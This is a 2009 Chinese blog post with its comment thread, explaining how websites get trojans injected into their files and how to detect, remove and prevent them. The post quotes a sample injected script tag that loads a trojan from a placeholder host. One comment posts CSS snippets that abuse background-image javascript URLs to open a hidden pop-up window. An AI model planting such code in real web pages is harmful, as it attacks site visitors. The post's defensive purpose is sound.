- 七月13
-
在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。
1:网页挂马的种类.目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。
卢松松以前做过的‘极品源码下载站’就遇到过JS挂马
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
‘校园闹翻天论坛’就遇到用户提权,利用动网程序漏洞(上传附件漏洞)拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID2:如何检测网页是否被挂马。
(1):专业检测工具,六款免费网页安全检测工具横向测评(华军软件园)点此进入
(2):google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。
(3):杀毒软件检测,常用的杀毒软件也可以检测出来。
(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。
(5):使用McAfee SiteAdvisor安全浏览网页的插件。例:检测卢松松博客是否安全可点此查看。

3:如何清除网页木马。
一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。
如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。
(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。
(2):保证你所使用的程序及时的更新。
(3):不要在前台网页上加注后台管理程序登陆页面的链接。
(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。
(5):管理员的用户名和密码要有一定复杂性,不能过于简单。
(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。
(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。
(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。 点此查看robots.txt使用方法。
原创文章请注明转载自卢松松博客,本文地址:http://www.lusongsong.com/reed/79.html




146楼 乐泰胶水
Post:2010-8-1 13:36:46
145楼 汽车导航仪品牌排名
Post:2010-7-28 23:08:52
144楼 学夫子
Post:2010-7-28 11:04:24
143楼 fdc
Post:2010-5-5 17:51:51
142楼 博客赚钱
Post:2010-2-26 12:24:24
使用的body 背景图 t 来挂的。。。
141楼 NBA世界
Post:2009-11-26 14:33:30
140楼 网页设计博客
Post:2009-11-2 17:22:40
139楼 青菜
Post:2009-10-17 9:01:48
138楼 三七八蛋
Post:2009-9-21 9:23:04
其他,比如空间那边的问题,就要看你的RP了。。。
上次我的空间那边,ARP攻击被搞了三次,,,
137楼 一个人
Post:2009-9-21 8:08:16
136楼 微知博客
Post:2009-9-17 16:57:49
135楼 ifu25
Post:2009-9-13 10:06:29
134楼 铠甲勇士全集
Post:2009-8-19 13:53:34
133楼 reizhi
Post:2009-8-10 15:56:15
132楼 痕迹
Post:2009-8-10 14:14:21
131楼 zhouwin
Post:2009-8-5 22:33:48
130楼 Eagle
Post:2009-8-4 9:28:53
129楼 兴诚
Post:2009-8-3 10:54:46
哎...被人挂了木马,,
速求助.....
qq:332778993
湖南兴诚养殖场
http://www.hnxingcheng.com
128楼 七叶草
Post:2009-8-2 23:58:46
127楼 浅笑无声
Post:2009-8-2 6:35:18
126楼 京东商城
Post:2009-7-30 15:57:40
连锁酒店
125楼 rav4
Post:2009-7-30 15:54:07
丰田RAV4
124楼 Davy
Post:2009-7-28 8:27:37
123楼 Noratis
Post:2009-7-26 10:15:39
122楼 imwxm
Post:2009-7-24 23:36:13
121楼 思亭
Post:2009-7-23 12:55:32
120楼 丁香
Post:2009-7-22 1:00:00
119楼 idea1983
Post:2009-7-20 16:05:23
118楼 idea1983
Post:2009-7-19 19:03:29
117楼 QQ网名
Post:2009-7-19 10:16:33
116楼 Bronco
Post:2009-7-18 19:34:49
115楼 Kaysnoopy
Post:2009-7-18 15:34:55
114楼 虾
Post:2009-7-17 15:46:25
马克思说过:世界上万事万物都是有联系的。从木马的角度来说,除木马病毒以外,其他任何东西都是木马病毒。不知道谁能理解虾说的这句话。
113楼 Joya
Post:2009-7-17 14:43:06
112楼 月下买醉
Post:2009-7-16 23:28:28
只帮别人做站,自己不弄……
帮人做好了也不负责维护……
(*^__^*)...嘻嘻
111楼 kramon
Post:2009-7-16 18:29:03
110楼 loofe
Post:2009-7-16 14:16:28
下联:那里的评论多又多
横批:博客中的沙发
不要见笑呵!呵!
109楼 life
Post:2009-7-16 10:30:33
108楼 johnny
Post:2009-7-16 8:53:16
107楼 零距离博客
Post:2009-7-16 0:52:27
106楼 leecay
Post:2009-7-16 0:31:13
105楼 newcoin
Post:2009-7-15 23:24:05
的其实不错,不过好像有点影响网速
个人小博客没人会挂马吧?
104楼 夹子
Post:2009-7-15 23:10:18
挂马呀。。。。
103楼 chanthon
Post:2009-7-15 18:06:25
102楼 古墓候梅
Post:2009-7-15 17:32:29
101楼 射击博客
Post:2009-7-15 15:50:16
100楼 射击博客
Post:2009-7-15 15:49:40
99楼 秋天一棵树
Post:2009-7-15 11:06:30
98楼 托尔银月
Post:2009-7-15 10:37:11
趁火打劫的意思~~~~
97楼 戴尔博客
Post:2009-7-15 9:59:38
96楼 浅笑无声
Post:2009-7-15 8:59:03
95楼 免费小说
Post:2009-7-14 23:32:16
94楼 敏锐的眼睛
Post:2009-7-14 22:54:53
93楼 YellowOne
Post:2009-7-14 22:53:17
92楼 seer.zou
Post:2009-7-14 22:41:29
91楼 hahn
Post:2009-7-14 22:38:00
两个月前我的博客PR也有4呢,但这几个月太忙没更新,变为零了。
挺喜欢这个博客:)
90楼 三脚猫
Post:2009-7-14 22:01:16
89楼 蛋王
Post:2009-7-14 21:47:12
88楼 各种虾米
Post:2009-7-14 21:40:38
87楼 西小西
Post:2009-7-14 21:16:56
86楼 YOJA
Post:2009-7-14 20:20:06
85楼 大帝007
Post:2009-7-14 19:58:04
84楼 Fengshen
Post:2009-7-14 19:36:41
83楼 西风
Post:2009-7-14 19:27:36
不过我所去过的黄色网站全部挂马
82楼 yibing
Post:2009-7-14 17:11:25
81楼 太阳博客
Post:2009-7-14 16:30:50
80楼 随影
Post:2009-7-14 16:09:07
79楼 燕子
Post:2009-7-14 16:08:24
我也說呢,怎麼會被掛馬呢?保管好密碼什麼的也不至於阿。。。
“現在的社會風氣實在太坏了”,不得不防阿
78楼 whitmine
Post:2009-7-14 15:53:29
77楼 CG
Post:2009-7-14 15:03:52
76楼 Yo2
Post:2009-7-14 15:03:52
75楼 52tool
Post:2009-7-14 14:37:23
74楼 怀仁大岗
Post:2009-7-14 14:30:08
73楼 JetKing
Post:2009-7-14 13:38:15
72楼 pan
Post:2009-7-14 12:27:53
71楼 zwwooooo
Post:2009-7-14 12:18:31
70楼 superwill
Post:2009-7-14 11:48:12
69楼 Aappy.com
Post:2009-7-14 11:46:55
68楼 superwill
Post:2009-7-14 11:44:41
呵呵,这个很有用,我去把我的删掉。
67楼 SMILE
Post:2009-7-14 11:15:10
66楼 ptubuntu
Post:2009-7-14 11:09:34
65楼 ptubuntu
Post:2009-7-14 11:09:05
64楼 北山
Post:2009-7-14 11:07:29
63楼 越夜
Post:2009-7-14 11:04:02
62楼 FORECE
Post:2009-7-14 10:20:39
61楼 世纪之光
Post:2009-7-14 10:11:06
不过看源文件发现被挂马,不一定是服务器端的原因,像ARP之内在客户端的攻击,同样可以导致客户端浏览器强制挂马,我就遇到过。
60楼 micogle
Post:2009-7-14 9:16:48
59楼 左岸读书
Post:2009-7-14 9:04:25
58楼 园子
Post:2009-7-14 9:01:44
每一个都值得认真去做~
57楼 0cai
Post:2009-7-14 8:52:35
56楼 追忆永恒
Post:2009-7-14 7:40:18
55楼 wxhao
Post:2009-7-14 6:40:56
收藏了
54楼 37计
Post:2009-7-14 2:48:47
后来终于想到一个好办法,把关给站了。他就不存在了。呵呵。
53楼 佘星星
Post:2009-7-14 1:01:59
52楼 daniel
Post:2009-7-13 23:59:17
51楼 Showfom
Post:2009-7-13 23:47:31
50楼 junjun
Post:2009-7-13 23:29:01
49楼 laofan
Post:2009-7-13 23:18:17
48楼 XDash
Post:2009-7-13 23:05:31
47楼 season
Post:2009-7-13 23:02:32
46楼 365hope
Post:2009-7-13 22:42:02
看来,需要按照老大的方法,解决这个问题啦!呵呵~~
45楼 海天无影
Post:2009-7-13 22:21:55
44楼 仁心博客
Post:2009-7-13 21:59:18
43楼 bolo
Post:2009-7-13 21:57:17
42楼 yoja
Post:2009-7-13 21:56:38
41楼 疯秀
Post:2009-7-13 21:53:34
40楼 歪歪屋啊
Post:2009-7-13 20:42:46
39楼 SpookZanG
Post:2009-7-13 20:42:19
38楼 浩子
Post:2009-7-13 20:32:08
呵呵
希望这种馅饼还是不要来
37楼 飞晏
Post:2009-7-13 20:29:54
放链接就放链接把 还把我网页搞成乱码!!!!
36楼 奋飞
Post:2009-7-13 20:22:23
35楼 Qing
Post:2009-7-13 20:21:04
34楼 蓝冰
Post:2009-7-13 20:04:22
谁在我破博客挂马有啥用
33楼 先看看
Post:2009-7-13 19:53:29
32楼 扬
Post:2009-7-13 19:48:09
31楼 Sean
Post:2009-7-13 19:37:54
30楼 未命名文档
Post:2009-7-13 19:29:49
又20多楼了!
29楼 huaimao
Post:2009-7-13 19:26:13
28楼 平平
Post:2009-7-13 19:25:22
27楼 A.shun
Post:2009-7-13 19:01:21
不过学着怎么防范和检测总是有用的
26楼 内大臣
Post:2009-7-13 18:48:14
25楼 笔头
Post:2009-7-13 17:56:50
24楼 吖Bee
Post:2009-7-13 17:54:05
23楼 Jutoy
Post:2009-7-13 17:39:36
22楼 细毛
Post:2009-7-13 17:26:22
21楼 idea1983
Post:2009-7-13 17:07:29
20楼 妖狐闪现
Post:2009-7-13 16:41:19
太牛了,查查去。
19楼 阿东
Post:2009-7-13 16:38:12
先顶起看。。
18楼 我想想
Post:2009-7-13 16:21:21
17楼 中药饮片
Post:2009-7-13 15:50:24
16楼 RayStorm
Post:2009-7-13 15:38:32
15楼 youKnowMe
Post:2009-7-13 15:13:15
14楼 快乐臭虫
Post:2009-7-13 15:10:22
13楼 志言
Post:2009-7-13 15:07:53
12楼 亦歌
Post:2009-7-13 15:04:25
11楼 回忆
Post:2009-7-13 15:03:37
10楼 万戈
Post:2009-7-13 14:47:55
9楼 simaopig
Post:2009-7-13 14:46:20
8楼 simaopig
Post:2009-7-13 14:45:58
7楼 KILLFOX
Post:2009-7-13 14:42:11
6楼 lowkey
Post:2009-7-13 14:39:29
5楼 小小
Post:2009-7-13 14:08:33
4楼 小鬼
Post:2009-7-13 13:50:39
Body{
background-image: url('javascript:document.write("")')
}
-------------------------------
Body{
background-image: url(javascript:open(' http://www.lyzsoft.cn ','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
3楼 小鬼
Post:2009-7-13 13:47:23
2楼 Lxhome
Post:2009-7-13 13:42:13
我得赶紧去查查了,不知道自己的有没有被挂马呢
1楼 Lxhome
Post:2009-7-13 13:41:00